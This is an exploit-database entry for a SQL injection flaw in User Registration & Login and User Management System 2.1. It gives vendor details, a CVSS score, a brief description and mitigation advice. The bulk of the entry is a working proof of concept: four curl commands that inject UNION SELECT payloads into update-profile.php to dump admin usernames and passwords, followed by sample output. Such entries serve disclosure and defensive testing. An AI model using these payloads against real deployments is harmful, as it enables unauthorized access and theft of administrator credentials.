User Registration & Login and User Management System 2.1 - SQL Injection

vendor:

User Registration & Login and User Management System

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: User Registration & Login and User Management System

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:user_registration_&_login_and_user_management_system:2.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

User Registration & Login and User Management System 2.1 – SQL Injection

The User Registration & Login and User Management System 2.1 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the admin panel by sending a malicious HTTP request to the update-profile.php page. The attacker can then use the GROUP_CONCAT() function to extract the admin credentials from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection
# Dork: N/A
# Date: 2020-10-22
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: 2.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# 
curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname

curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname

curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email

curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact
#
# <input type="text" class="form-control" name="fname" value="[ID: 1 ] [ Username: xxx ] [ Password: xxx]" >
#